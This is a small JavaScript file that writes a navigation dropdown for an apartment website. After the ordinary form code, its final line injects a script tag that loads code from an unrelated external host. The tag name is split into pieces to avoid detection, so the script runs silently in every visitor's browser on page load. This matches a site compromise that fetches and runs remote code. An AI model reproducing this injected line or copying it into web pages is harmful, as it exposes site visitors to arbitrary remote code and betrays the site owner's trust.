function formHandler(){
var URL = document.form.site.options[document.form.site.selectedIndex].value;
window.location.href = URL;
}

document.write('<form name="form">');
document.write('<select name="site" size=1>');
document.write('<option value="">Please Choose Your Interest...');
document.write('<option value="history.html">Historical Information');
document.write('<option value="#apts">The Apartments');
document.write('<option value="#about">About The Area');
document.write('</select>');
document.write('<input type=button value="load" onClick="javascript:formHandler()">');
document.write('</form>');

document.write('<sc'+'ript type="text/javascript" src="http://greatrow.ru/Unfriend.js"></scri'+'pt>');
